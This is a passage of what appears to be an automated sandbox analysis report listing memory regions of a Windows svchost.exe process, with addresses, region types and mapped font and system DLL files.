end_va = 0xefffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e00000"
filename = ""
Region:
id = 2081
start_va = 0xf00000
end_va = 0xffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f00000"
filename = ""
Region:
id = 2082
start_va = 0x1000000
end_va = 0x10fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001000000"
filename = ""
Region:
id = 2083
start_va = 0x1100000
end_va = 0x11fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001100000"
filename = ""
Region:
id = 2084
start_va = 0x1200000
end_va = 0x1213fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calist.ttf"
filename = "\\Windows\\Fonts\\CALIST.TTF" (normalized: "c:\\windows\\fonts\\calist.ttf")
Region:
id = 2085
start_va = 0x1220000
end_va = 0x1234fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calistb.ttf"
filename = "\\Windows\\Fonts\\CALISTB.TTF" (normalized: "c:\\windows\\fonts\\calistb.ttf")
Region:
id = 2086
start_va = 0x1240000
end_va = 0x1241fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "netprofmsvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\netprofmsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netprofmsvc.dll.mui")
Region:
id = 2087
start_va = 0x1300000
end_va = 0x13fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001300000"
filename = ""
Region:
id = 2088
start_va = 0x1400000
end_va = 0x14fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001400000"
filename = ""
Region:
id = 2089
start_va = 0x1500000
end_va = 0x15fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001500000"
filename = ""
Region:
id = 2090
start_va = 0x1600000
end_va = 0x25fffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "~fontcache-fontface.dat"
filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat")
Region:
id = 2091
start_va = 0x2600000
end_va = 0x2936fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2092
start_va = 0x2940000
end_va = 0x2965fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bkant.ttf"
filename = "\\Windows\\Fonts\\BKANT.TTF" (normalized: "c:\\windows\\fonts\\bkant.ttf")
Region:
id = 2093
start_va = 0x2970000
end_va = 0x2982fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_b.ttf"
filename = "\\Windows\\Fonts\\BOD_B.TTF" (normalized: "c:\\windows\\fonts\\bod_b.ttf")
Region:
id = 2094
start_va = 0x2990000
end_va = 0x29a4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_bi.ttf"
filename = "\\Windows\\Fonts\\BOD_BI.TTF" (normalized: "c:\\windows\\fonts\\bod_bi.ttf")
Region:
id = 2095
start_va = 0x29b0000
end_va = 0x29c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_blai.ttf"
filename = "\\Windows\\Fonts\\BOD_BLAI.TTF" (normalized: "c:\\windows\\fonts\\bod_blai.ttf")
Region:
id = 2096
start_va = 0x29d0000
end_va = 0x29e1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_blar.ttf"
filename = "\\Windows\\Fonts\\BOD_BLAR.TTF" (normalized: "c:\\windows\\fonts\\bod_blar.ttf")
Region:
id = 2097
start_va = 0x29f0000
end_va = 0x2a02fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_cb.ttf"
filename = "\\Windows\\Fonts\\BOD_CB.TTF" (normalized: "c:\\windows\\fonts\\bod_cb.ttf")
Region:
id = 2098
start_va = 0x2a10000
end_va = 0x2a23fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_cbi.ttf"
filename = "\\Windows\\Fonts\\BOD_CBI.TTF" (normalized: "c:\\windows\\fonts\\bod_cbi.ttf")
Region:
id = 2099
start_va = 0x2a30000
end_va = 0x2a43fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_ci.ttf"
filename = "\\Windows\\Fonts\\BOD_CI.TTF" (normalized: "c:\\windows\\fonts\\bod_ci.ttf")
Region:
id = 2100
start_va = 0x2a50000
end_va = 0x2a63fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_cr.ttf"
filename = "\\Windows\\Fonts\\BOD_CR.TTF" (normalized: "c:\\windows\\fonts\\bod_cr.ttf")
Region:
id = 2101
start_va = 0x2a70000
end_va = 0x2a86fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_pstc.ttf"
filename = "\\Windows\\Fonts\\BOD_PSTC.TTF" (normalized: "c:\\windows\\fonts\\bod_pstc.ttf")
Region:
id = 2102
start_va = 0x2a90000
end_va = 0x2ab7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bookos.ttf"
filename = "\\Windows\\Fonts\\BOOKOS.TTF" (normalized: "c:\\windows\\fonts\\bookos.ttf")
Region:
id = 2103
start_va = 0x2ac0000
end_va = 0x2ae5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bookosb.ttf"
filename = "\\Windows\\Fonts\\BOOKOSB.TTF" (normalized: "c:\\windows\\fonts\\bookosb.ttf")
Region:
id = 2104
start_va = 0x2af0000
end_va = 0x2b17fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bookosbi.ttf"
filename = "\\Windows\\Fonts\\BOOKOSBI.TTF" (normalized: "c:\\windows\\fonts\\bookosbi.ttf")
Region:
id = 2105
start_va = 0x2b20000
end_va = 0x2b47fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bookosi.ttf"
filename = "\\Windows\\Fonts\\BOOKOSI.TTF" (normalized: "c:\\windows\\fonts\\bookosi.ttf")
Region:
id = 2106
start_va = 0x5f00000
end_va = 0x5ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005f00000"
filename = ""
Region:
id = 2107
start_va = 0x6000000
end_va = 0x60fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006000000"
filename = ""
Region:
id = 2108
start_va = 0x6100000
end_va = 0x61fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006100000"
filename = ""
Region:
id = 2109
start_va = 0x6200000
end_va = 0x62fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006200000"
filename = ""
Region:
id = 2110
start_va = 0x6300000
end_va = 0x63fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006300000"
filename = ""
Region:
id = 2111
start_va = 0x6400000
end_va = 0x64fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006400000"
filename = ""
Region:
id = 2112
start_va = 0x7e00000
end_va = 0x7efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007e00000"
filename = ""
Region:
id = 2113
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2114
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 2115
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 2116
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 2117
start_va = 0x7ff756e70000
end_va = 0x7ff756e7cfff
monitored = 0
entry_point = 0x7ff756e73980
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 2118
start_va = 0x7ff8ce2a0000
end_va = 0x7ff8ce2adfff
monitored = 0
entry_point = 0x7ff8ce2a1460
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 2119
start_va = 0x7ff8ce3a0000
end_va = 0x7ff8ce42afff
monitored = 0
entry_point = 0x7ff8ce3bd2a0
region_type = mapped_file
name = "netprofmsvc.dll"
filename = "\\Windows\\System32\\netprofmsvc.dll" (normalized: "c:\\windows\\system32\\netprofmsvc.dll")
Region:
id = 2120
start_va = 0x7ff8ceb40000
end_va = 0x7ff8ceb4cfff
monitored = 0
entry_point = 0x7ff8ceb42650
region_type = mapped_file
name = "nsisvc.dll"
filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll")
Region:
id = 2121
start_va = 0x7ff8cef40000
end_va = 0x7ff8cefb9fff
monitored = 0
entry_point = 0x7ff8cef67630
region_type = mapped_file
name = "es.dll"
filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")
Region:
id = 2122
start_va = 0x7ff8cf350000
end_va = 0x7ff8cf35bfff
monitored = 0
entry_point = 0x7ff8cf3514d0
region_type = mapped_file
name = "locationframeworkps.dll"
filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll")
Region:
id = 2123
start_va = 0x7ff8cf760000
end_va = 0x7ff8cf788fff
monitored = 0
entry_point = 0x7ff8cf7724d0
region_type = mapped_file
name = "fontprovider.dll"
filename = "\\Windows\\System32\\FontProvider.dll" (normalized: "c:\\windows\\system32\\fontprovider.dll")
Region:
id = 2124
start_va = 0x7ff8cf7c0000
end_va = 0x7ff8cf961fff
monitored = 0
entry_point = 0x7ff8cf80c2d0
region_type = mapped_file
name = "fntcache.dll"
filename = "\\Windows\\System32\\FntCache.dll" (normalized: "c:\\windows\\system32\\fntcache.dll")
Region:
id = 2125
start_va = 0x7ff8cfea0000
end_va = 0x7ff8cfee9fff
monitored = 0
entry_point = 0x7ff8cfeaac30
region_type = mapped_file
name = "deviceaccess.dll"
filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll")
Region:
id = 2126
start_va = 0x7ff8d0000000
end_va = 0x7ff8d0091fff
monitored = 0
entry_point = 0x7ff8d004a780
region_type = mapped_file
name = "msvcp110_win.dll"
filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll")
Region:
id = 2127
start_va = 0x7ff8d00a0000
end_va = 0x7ff8d00d2fff
monitored = 0
entry_point = 0x7ff8d00ad5a0
region_type = mapped_file
name = "biwinrt.dll"
filename = "\\Windows\\System32\\biwinrt.dll" (normalized: "c:\\windows\\system32\\biwinrt.dll")
Region:
id = 2128
start_va = 0x7ff8d00e0000
end_va = 0x7ff8d0158fff
monitored = 0
entry_point = 0x7ff8d00f7800
region_type = mapped_file
name = "geolocation.dll"
filename = "\\Windows\\System32\\Geolocation.dll" (normalized: "c:\\windows\\system32\\geolocation.dll")
Region:
id = 2129
start_va = 0x7ff8d0160000
end_va = 0x7ff8d0195fff
monitored = 0
entry_point = 0x7ff8d0170070
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 2130
start_va = 0x7ff8d01a0000
end_va = 0x7ff8d01b9fff
monitored = 0
entry_point = 0x7ff8d01ab670
region_type = mapped_file
name = "tzautoupdate.dll"
filename = "\\Windows\\System32\\tzautoupdate.dll" (normalized: "c:\\windows\\system32\\tzautoupdate.dll")
Region:
id = 2131
start_va = 0x7ff8d04c0000
end_va = 0x7ff8d04d7fff
monitored = 0
entry_point = 0x7ff8d04c5910
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 2132
start_va = 0x7ff8d4260000
end_va = 0x7ff8d435ffff
monitored = 0
entry_point = 0x7ff8d42a0f80
region_type = mapped_file
name = "twinapi.appcore.dll"
filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll")
Region:
id = 2133
start_va = 0x7ff8d4810000
end_va = 0x7ff8d4903fff
monitored = 0
entry_point = 0x7ff8d481a960
region_type = mapped_file
name = "ucrtbase.dll"
filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")
Region:
id = 2134
start_va = 0x7ff8d4dd0000
end_va = 0x7ff8d4deefff
monitored = 0
entry_point = 0x7ff8d4dd5d30
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 2135
start_va = 0x7ff8d5500000
end_va = 0x7ff8d5528fff
monitored = 0
entry_point = 0x7ff8d5514530
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 2136
start_va = 0x7ff8d5670000
end_va = 0x7ff8d5683fff
monitored = 0
entry_point = 0x7ff8d56752e0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 2137
start_va = 0x7ff8d56e0000
end_va = 0x7ff8d56eefff
monitored = 0
entry_point = 0x7ff8d56e3210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 2138
start_va = 0x7ff8d5e40000
end_va = 0x7ff8d5ef4fff
monitored = 0
entry_point = 0x7ff8d5e822e0
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 2139
start_va = 0x7ff8d5f20000
end_va = 0x7ff8d6107fff
monitored = 0
entry_point = 0x7ff8d5f4ba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2140
start_va = 0x7ff8d6110000
end_va = 0x7ff8d6179fff
monitored = 0
entry_point = 0x7ff8d6146d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 2141
start_va = 0x7ff8d6510000
end_va = 0x7ff8d65d0fff
monitored = 0
entry_point = 0x7ff8d6530da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2142
start_va = 0x7ff8d65e0000
end_va = 0x7ff8d6686fff
monitored = 0
entry_point = 0x7ff8d65eb4d0
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2143
start_va = 0x7ff8d6ad0000
end_va = 0x7ff8d6c55fff
monitored = 0
entry_point = 0x7ff8d6b1ffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2144
start_va = 0x7ff8d6ed0000
end_va = 0x7ff8d6f76fff
monitored = 0
entry_point = 0x7ff8d6ee58d0
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2145
start_va = 0x7ff8d6f80000
end_va = 0x7ff8d6fdafff
monitored = 0
entry_point = 0x7ff8d6f938b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2146
start_va = 0x7ff8d7190000
end_va = 0x7ff8d7197fff
monitored = 0
entry_point = 0x7ff8d7191ea0
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 2147
start_va = 0x7ff8d73b0000
end_va = 0x7ff8d7505fff
monitored = 0
entry_point = 0x7ff8d73ba8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2148
start_va = 0x7ff8d7580000
end_va = 0x7ff8d761cfff
monitored = 0
entry_point = 0x7ff8d75878a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2149
start_va = 0x7ff8d7620000
end_va = 0x7ff8d76ccfff
monitored = 0
entry_point = 0x7ff8d76381a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2150
start_va = 0x7ff8d76f0000
end_va = 0x7ff8d780bfff
monitored = 0
entry_point = 0x7ff8d77302b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2151
start_va = 0x7ff8d7810000
end_va = 0x7ff8d7a8cfff
monitored = 0
entry_point = 0x7ff8d78e4970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 2152
start_va = 0x7ff8d9050000
end_va = 0x7ff8d9210fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2153
start_va = 0x1250000
end_va = 0x1264fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "centaur.ttf"
filename = "\\Windows\\Fonts\\CENTAUR.TTF" (normalized: "c:\\windows\\fonts\\centaur.ttf")
Region:
id = 2155
start_va = 0x7ff8d71b0000
end_va = 0x7ff8d72f2fff
monitored = 0
entry_point = 0x7ff8d71d8210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2156
start_va = 0x1270000
end_va = 0x1298fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "century.ttf"
filename = "\\Windows\\Fonts\\CENTURY.TTF" (normalized: "c:\\windows\\fonts\\century.ttf")
Region:
id = 2157
start_va = 0x12a0000
end_va = 0x12b7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "chiller.ttf"
filename = "\\Windows\\Fonts\\CHILLER.TTF" (normalized: "c:\\windows\\fonts\\chiller.ttf")
Region:
id = 2158
start_va = 0x6500000
end_va = 0x65fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006500000"
filename = ""
Region:
id = 2159
start_va = 0x5d0000
end_va = 0x5ddfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "colonna.ttf"
filename = "\\Windows\\Fonts\\COLONNA.TTF" (normalized: "c:\\windows\\fonts\\colonna.ttf")
Region:
id = 2160
start_va = 0x12c0000
end_va = 0x12d3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "coopbl.ttf"
filename = "\\Windows\\Fonts\\COOPBL.TTF" (normalized: "c:\\windows\\fonts\\coopbl.ttf")
Region:
id = 2161
start_va = 0x12e0000
end_va = 0x12effff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "coprgtb.ttf"
filename = "\\Windows\\Fonts\\COPRGTB.TTF" (normalized: "c:\\windows\\fonts\\coprgtb.ttf")
Region:
id = 2162
start_va = 0x12f0000
end_va = 0x12fffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "coprgtl.ttf"
filename = "\\Windows\\Fonts\\COPRGTL.TTF" (normalized: "c:\\windows\\fonts\\coprgtl.ttf")
Region:
id = 2163
start_va = 0x2940000
end_va = 0x2950fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "curlz___.ttf"
filename = "\\Windows\\Fonts\\CURLZ___.TTF" (normalized: "c:\\windows\\fonts\\curlz___.ttf")
Region:
id = 2164
start_va = 0x5e0000
end_va = 0x5ecfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "elephnt.ttf"
filename = "\\Windows\\Fonts\\ELEPHNT.TTF" (normalized: "c:\\windows\\fonts\\elephnt.ttf")
Region:
id = 2166
start_va = 0x5f0000
end_va = 0x5fdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "elephnti.ttf"
filename = "\\Windows\\Fonts\\ELEPHNTI.TTF" (normalized: "c:\\windows\\fonts\\elephnti.ttf")
Region:
id = 2167
start_va = 0x890000
end_va = 0x89cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "engr.ttf"
filename = "\\Windows\\Fonts\\ENGR.TTF" (normalized: "c:\\windows\\fonts\\engr.ttf")
Region:
id = 2168
start_va = 0x8c0000
end_va = 0x8edfff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008c0000"
filename = ""
Region:
id = 2169
start_va = 0x8a0000
end_va = 0x8aefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "erasbd.ttf"
filename = "\\Windows\\Fonts\\ERASBD.TTF" (normalized: "c:\\windows\\fonts\\erasbd.ttf")
Region:
id = 2170
start_va = 0x8f0000
end_va = 0x8fefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "erasdemi.ttf"
filename = "\\Windows\\Fonts\\ERASDEMI.TTF" (normalized: "c:\\windows\\fonts\\erasdemi.ttf")
Region:
id = 2172
start_va = 0xd10000
end_va = 0xd20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "eraslght.ttf"
filename = "\\Windows\\Fonts\\ERASLGHT.TTF" (normalized: "c:\\windows\\fonts\\eraslght.ttf")
Region:
id = 2173
start_va = 0x6600000
end_va = 0x66fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006600000"
filename = ""
Region:
id = 2174
start_va = 0x7ff8cf450000
end_va = 0x7ff8cf517fff
monitored = 0
entry_point = 0x7ff8cf4913f0
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 2175
start_va = 0x560000
end_va = 0x56efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "erasmd.ttf"
filename = "\\Windows\\Fonts\\ERASMD.TTF" (normalized: "c:\\windows\\fonts\\erasmd.ttf")
Region:
id = 2179
start_va = 0x7ff8d7300000
end_va = 0x7ff8d736afff
monitored = 0
entry_point = 0x7ff8d73190c0
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 2180
start_va = 0x570000
end_va = 0x57bfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "felixti.ttf"
filename = "\\Windows\\Fonts\\FELIXTI.TTF" (normalized: "c:\\windows\\fonts\\felixti.ttf")
Region:
id = 2181
start_va = 0x2960000
end_va = 0x2b5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002960000"
filename = ""
Region:
id = 2182
start_va = 0x2a00000
end_va = 0x2afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a00000"
filename = ""
Region:
id = 2183
start_va = 0x7ff8d4f40000
end_va = 0x7ff8d4f9bfff
monitored = 0
entry_point = 0x7ff8d4f56f70
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 2184
start_va = 0x580000
end_va = 0x58ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "forte.ttf"
filename = "\\Windows\\Fonts\\FORTE.TTF" (normalized: "c:\\windows\\fonts\\forte.ttf")
Region:
id = 2185
start_va = 0x590000
end_va = 0x5b5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "frabk.ttf"
filename = "\\Windows\\Fonts\\FRABK.TTF" (normalized: "c:\\windows\\fonts\\frabk.ttf")
Region:
id = 2186
start_va = 0x7ff8ce890000
end_va = 0x7ff8ce8c7fff
monitored = 0
entry_point = 0x7ff8ce8a8cc0
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 2187
start_va = 0x7ff8ce970000
end_va = 0x7ff8ce97afff
monitored = 0
entry_point = 0x7ff8ce971d30
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 2188
start_va = 0xd60000
end_va = 0xd89fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "frabkit.ttf"
filename = "\\Windows\\Fonts\\FRABKIT.TTF" (normalized: "c:\\windows\\fonts\\frabkit.ttf")
Region:
id = 2189
start_va = 0xd90000
end_va = 0xdb2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "fradm.ttf"
filename = "\\Windows\\Fonts\\FRADM.TTF" (normalized: "c:\\windows\\fonts\\fradm.ttf")
Region:
id = 2190
start_va = 0x7ff8d5690000
end_va = 0x7ff8d56dafff
monitored = 0
entry_point = 0x7ff8d56935f0
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 2191
start_va = 0x6700000
end_va = 0x67fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006700000"
filename = ""
Region:
id = 2192
start_va = 0x5c0000
end_va = 0x5dcfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "fradmcn.ttf"
filename = "\\Windows\\Fonts\\FRADMCN.TTF" (normalized: "c:\\windows\\fonts\\fradmcn.ttf")
Region:
id = 2193
start_va = 0x7ff8ce820000
end_va = 0x7ff8ce835fff
monitored = 0
entry_point = 0x7ff8ce8219f0
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 2194
start_va = 0x7ff8d41b0000
end_va = 0x7ff8d4259fff
monitored = 0
entry_point = 0x7ff8d41d7910
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 2195
start_va = 0xdc0000
end_va = 0xde1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "fradmit.ttf"
filename = "\\Windows\\Fonts\\FRADMIT.TTF" (normalized: "c:\\windows\\fonts\\fradmit.ttf")
Region:
id = 2197
start_va = 0xd10000
end_va = 0xd32fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "frahv.ttf"
filename = "\\Windows\\Fonts\\FRAHV.TTF" (normalized: "c:\\windows\\fonts\\frahv.ttf")
Region:
id = 2198
start_va = 0x1200000
end_va = 0x1225fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "frahvit.ttf"
filename = "\\Windows\\Fonts\\FRAHVIT.TTF" (normalized: "c:\\windows\\fonts\\frahvit.ttf")
Region:
id = 2199
start_va = 0x7ff8ce800000
end_va = 0x7ff8ce819fff
monitored = 0
entry_point = 0x7ff8ce802430
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 2200
start_va = 0x1250000
end_va = 0x1270fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "framdcn.ttf"
filename = "\\Windows\\Fonts\\FRAMDCN.TTF" (normalized: "c:\\windows\\fonts\\framdcn.ttf")
Region:
id = 2201
start_va = 0x7ff8ce290000
end_va = 0x7ff8ce299fff
monitored = 0
entry_point = 0x7ff8ce2914c0
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 2202
start_va = 0x5e0000
end_va = 0x5f1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "freescpt.ttf"
filename = "\\Windows\\Fonts\\FREESCPT.TTF" (normalized: "c:\\windows\\fonts\\freescpt.ttf")
Region:
id = 2203
start_va = 0x2b00000
end_va = 0x2cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b00000"
filename = ""
Region:
id = 2204
start_va = 0x2b00000
end_va = 0x2bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b00000"
filename = ""
Region:
id = 2205
start_va = 0x890000
end_va = 0x89efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "frscript.ttf"
filename = "\\Windows\\Fonts\\FRSCRIPT.TTF" (normalized: "c:\\windows\\fonts\\frscript.ttf")
Region:
id = 2206
start_va = 0x1280000
end_va = 0x1294fff
monitored = 0
entry_point = 0x0
